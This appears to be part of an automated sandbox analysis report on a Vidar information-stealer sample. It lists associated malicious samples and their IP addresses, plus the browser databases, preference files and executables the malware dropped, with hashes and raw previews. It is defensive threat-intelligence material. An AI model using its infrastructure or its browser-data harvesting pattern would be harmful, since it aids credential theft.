                                                                                                                                                                ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                ikores.sbsSetup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                TELEGRAMRUPO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                ozctQoBg1o.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                SPhzvjk8wx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                Q0Sh31btX8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                o7H9XLUD9z.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                764GVLyJne.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                HETZNER-ASDESetup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                https://sendgb.com/Aw8gObHpGVR?utm_medium=dZJEAfc2MGnvjBDGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                • 5.161.50.209
                                                                                                                                                                payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                • 213.239.239.164
                                                                                                                                                                ky.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 148.251.114.233
                                                                                                                                                                List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                • 213.239.239.164
                                                                                                                                                                ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                • 213.239.239.164
                                                                                                                                                                script.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 148.251.114.233
                                                                                                                                                                mg.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 148.251.114.233
                                                                                                                                                                mj.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 148.251.114.233
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                DKfcEFnBtm.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                vj3dH1vmYe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                NIsNyN2CTq.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                TPDKSYfEac.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                YQbn27ZkYY.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                • 5.75.212.196
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\402438\Suicide.comSetup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                  Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                        ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          ton.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            File.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                                                                                                                              Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC StealerBrowse
                                                                                                                                                                                  'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):126976
                                                                                                                                                                                    Entropy (8bit):0.47147045728725767
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                    Entropy (8bit):0.08436842005578409
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                    MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                    SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                    SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                    SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):9571
                                                                                                                                                                                    Entropy (8bit):5.536643647658967
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                    Entropy (8bit):0.7873599747470391
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):114688
                                                                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                    Entropy (8bit):5.36267152276823
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:SfNaoCZTECXfNaoCYCtfNaoCWq9CWjfNaoCiR0UrU0U8Cc:6NnCZTECPNnCYCZNnC9CQNnCS0UrU0Uq
                                                                                                                                                                                    MD5:A0A02A496DF64BBDD6D151A8E318116C
                                                                                                                                                                                    SHA1:12B445B45837022566B3CF52530EF10B89E31B3A
                                                                                                                                                                                    SHA-256:E77E70D02DA62F6B43A6F8C0BDC7F99BEBE210D4E90A69D0AE22084E664EBEC4
                                                                                                                                                                                    SHA-512:902DEE9B97A2D577A8AE58A5A3AFEB2D34444D74DAA1D3F2E2746A704851B55DE8B2DCEB936B51E3EB47F6FBB1F1070C9A917E545AC10028179F7B6E3039B45B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5847494C3722E186476313CE3BBA9904",.. "id": "5847494C3722E186476313CE3BBA9904",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5847494C3722E186476313CE3BBA9904"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9602B6123C9396F216D0293AA0F03423",.. "id": "9602B6123C9396F216D0293AA0F03423",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9602B6123C9396F216D0293AA0F03423"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):616256
                                                                                                                                                                                    Entropy (8bit):7.999706856605573
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:12288:kEqnNQOULFK7mwGetB1VjDAEOm1fSNHKKRNlU/gJK5dcGVVI1zMp2HI7NHX5V/K:kEqnNoFK7FbB/DAEOpFKENlIlVW1zqHy
                                                                                                                                                                                    MD5:A1E27735C62920884D7290B37D09145B
                                                                                                                                                                                    SHA1:7E7184AC38B3DB65344C243E14AE5ED2A31CEA49
                                                                                                                                                                                    SHA-256:F1756FD26A5F53CCCFDAF28C98BF84004187F70D67D5711A9FD8B157FE0B1019
                                                                                                                                                                                    SHA-512:2FFC0EA0947CFEF9383DA475C70D35B6D2D504DEEC202DEB22474D8EFD82AA04B72328254A523DD2CAC5B214A6EFFD2BFED585831EBE2187A315079918E2097F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..u.VMfM....f'4....DSb..>/~.....-S..A.?.H%..w..J..dEv.o.......e.o.v_^p.K......g3..<L:\....!.P.{.-..0..g+.A89.v..........r.p.qS.1.s.`.6G........j%$c.c...S......c..$..S...3.....$.QK/y...X*./>.9U.?4.o.e..n0o.....YmR..97..Ggw..:.L...a.z..D.}..z0k&..U^s7..&6.74.....:m.......6...R....}.a.z..fI..tCM.s..7..~...*...0..N....5..5p.,X..^.a....1.k.Gg....7g.....e.kHy.^.v..)...P...e....=m...%....X..7.&n...."...._N..\.;.X..a....... $L....s`O.~.q.H.".......5.a. ..u......mZT..ui...:<.yh.Wm._...?8..h..5..$H;..i|@..P.3~.*......l...a....s.d0,.P.2.g..[.\.=...[:...x.....Lq^....8.....?.=UO<.t.z*.]..3.k^.K.B?@.K........d....*.tam.)$..U.......s.b..Q..Rs,.S..3.-..)r....U8.S.0{[>.x.l!.W.)!..o_......V....Yu 7..a.r..{..]].....OY...N@...o8....I..M...........w<..[......hk[#c.._.~~..G....Q$...G.g.\...*....k1._...V.*C#i..CWB............A.M V...*.S...&.C.6Sav...).....[....~.#..4Z(.......X...,..3...q..iE...0..cY..@B]..R/.-3....K.Tb..._U...vE.+D..... .`.<..8.#......
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):893608
                                                                                                                                                                                    Entropy (8bit):6.620254876639106
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                                                                                                                    MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                                                                    SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                                                                                                                    SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                                                                                                                    SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: ton.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: ton.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: File.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Full_Setup_v24.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):53056
                                                                                                                                                                                    Entropy (8bit):7.996381450136675
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:fMRzElw0bdj8XI6bzj5juitd8Mh/kENmQeHY4:Gglwidkbbzj5LXh/U24
                                                                                                                                                                                    MD5:A98C50301213020F0A10E841A3652FF5
                                                                                                                                                                                    SHA1:2C0FC3D0C082583BD15E1E6388DF2869FDECC234
                                                                                                                                                                                    SHA-256:C6259EA037D04A86146D111611B1EF563296BCE401F687794D2A96F018575106
                                                                                                                                                                                    SHA-512:91A100725F9A4BBA585889A3F3E88D898610C34225DF138C7A76324F1B1D97595F41FD85541AD0A20D5553C8602FAA84BFC3D16DBE65F19C1FAD3B8699E42256
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:........x..w.x...hm79B.(J...Y=.....2'....q.].z.........gp....x..T....<.....~j.~:..."..L.n.t.....\.....}Z.....7..G..3.O%..@l.A.............).4..4'.=mm...s..m.X<<.d.wXKC.....?...>....uc..j.`.2:...7...^..d..Y....GIyt1....Qw..,..O...#m...}....$......p.<0..f.].../..k..:..B..LR......7.n/Q@..bd..T.m.........ov;...3.].?3..Iz..7..xE.d.I".~.+.!....../9s..Q....#5U..S{...T.X.q.8..g.......V.].....w.>EkC p....~..l1..q..v.....4..v..R&.X....,f..{/.6....v..)=.C.s$.I(.PH.U..$...-..=v./...\fO!.s.V...Q{T...X.X.<D...Z+?.x.8{.......t..zzf..a}.$...D*......C.^..qn..%....&...z........n....w.KG2....Hh2.K<..[....:%?.........O:..s..)._o......VV..!\....S..]rW.\..E(.I...[.T.$vh.|.f..8T.Le.H.9.[.T..+...........z....|...h.|..|...+....B..9...2........1.B.|ZL.._9.{..gY,..\.f..f.j.d.T.F....u..Z;..Z.V7u.+...[....s..DD...^L....{!.......=....).o..K..u...=..+~k!.Lq....:?...Qq...5P.<....I#$S#.f3...}]....<.O.+W ......xo..(..#Dp.7.....Uo<.MsP...`-.7......-v..A...G.].[.T.P...d..B..,
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):118784
                                                                                                                                                                                    Entropy (8bit):5.509135628255196
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:HUGM4INduPbOU+aI4kSmEusWjcd+DvFQC7VkrHpIu9xhSaAwuNbCc/mex/SSi:ZMBNB+usWjcdGQuklIusaAwu9hPxi
                                                                                                                                                                                    MD5:9C68F92129BAE60CB72E678A694EE44A
                                                                                                                                                                                    SHA1:58CF0171E00341E460FEE379E11C0F6B7C8B8A2F
                                                                                                                                                                                    SHA-256:25996AC1B1BB15F1171EBD90EE317ACE372E97D6AF73889A7FC1DD398C11A245
                                                                                                                                                                                    SHA-512:8DFEAE08963DB62D95B49EF361635572A880D11B79A369528686ED6B7528F5B65C94EFA9AF78076F56EE4037E4EE2934D9D39B2E8803B1C48A1550DA6C77E2E7
                                                                                                                                                                                    Malicious:false
